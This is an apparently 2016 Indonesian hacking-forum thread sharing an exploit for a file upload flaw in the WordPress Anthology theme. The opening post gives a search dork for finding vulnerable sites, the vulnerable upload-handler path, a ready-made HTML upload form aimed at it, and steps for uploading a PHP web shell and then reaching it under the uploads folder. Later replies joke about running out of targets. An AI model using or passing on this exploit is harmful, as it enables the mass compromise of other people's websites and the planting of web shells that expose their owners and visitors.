+- BackBox Indonesia (https://www.backboxindonesia.or.id)
+-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html)
+--- Forum: Exploitation (https://www.backboxindonesia.or.id/forum-13.html)
+--- Thread: Exploit WordPress Anthology Themes Remote File Upload Vulnerability (/thread-26.html)
Exploit WordPress Anthology Themes Remote File Upload Vulnerability - Nue Bhandell - 03-10-2016
Aloo Malam gengs, tengah malam gini masih ada yg idup gak nih ? wkwkw :D
iseng2 share exploit lama, kali aja masih crotz awkakw.
yg dh master minggir dlu beb :heart:
lanjot.
inurl:/wp-content/themes/Anthology/
(sisanya kembangin lagi, gunakan imajinasi vokever kalian, biar bisa dpt yang vuln and verawan).
exploit: /wp-content/themes/Anthology/functions/upload-handler.php
ciri2 vuln o.O ?
muncul error atau blank *kira2 sih gitu, maap kalo salah akwakawk
![[Image: a3vN8Ln.png]](http://i.imgur.com/a3vN8Ln.png)
Copy Script CSRF Upload nya:
<form enctype="multipart/form-data"
action="target.co.li/wp-content/themes/Anthology/functions/upload-handler.php" method="post">
Please choose a file: <input name="pexetofile" type="file" /><br />
<input type="submit" value="upload" />
</form>
jika sudah buka CSRF Upload nya, lalu upload deh file/shell kalian.
Jika Upload nya sukses nanti akan muncul nama file/shell kalian gengs :3
![[Image: TqGjVFQ.png]](http://i.imgur.com/TqGjVFQ.png)
Shell Akses: target.co.li/wp-content/uploads/[year]/[month]/namashell.php
![[Image: necnt7I.png]](http://i.imgur.com/necnt7I.png)
Done x_O
kunjungin blog saya juga ya gengs: TKJ Cyber Art
Sumur
semoga bermanfaat Gengs, maap kalo post cupu :)
waktunya Nue dan tim Katakan Putus cabut dulu gengs, karna bsk masih Ujian Sekolah gengs wkwkwk.
bye ..
RE: Exploit WordPress Anthology Themes Remote File Upload Vulnerability - anongep - 03-10-2016
komeng ^_^ ~
RE: Exploit WordPress Anthology Themes Remote File Upload Vulnerability - Nue Bhandell - 03-10-2016
(03-10-2016, 06:33 PM)anongep Wrote: komeng ^_^ ~
awkawkaw tengkyu :v
RE: Exploit WordPress Anthology Themes Remote File Upload Vulnerability - kalong404 - 03-11-2016
Gagal pertamax gan..
RE: Exploit WordPress Anthology Themes Remote File Upload Vulnerability - Nue Bhandell - 03-11-2016
(03-11-2016, 02:51 AM)kalong404 Wrote: Gagal pertamax gan..
awkakwkkaw :D
RE: Exploit WordPress Anthology Themes Remote File Upload Vulnerability - cyber173 - 03-15-2016
yee si ijo ^_^
RE: Exploit WordPress Anthology Themes Remote File Upload Vulnerability - ./EL-Mueeza_23 - 03-27-2016
kehabisan target kayaknya :v
RE: Exploit WordPress Anthology Themes Remote File Upload Vulnerability - Nue Bhandell - 03-29-2016
(03-15-2016, 05:55 AM)cyber173 Wrote: yee si ijo ^_^
tetep setia ama si ijo abang, dan IFC :D awkkaw
(03-27-2016, 05:39 AM)./EL-Mueeza_23 Wrote: kehabisan target kayaknya :v
awkakwwka iya bang akwkaw :D
dh nemu itu doang akwkwa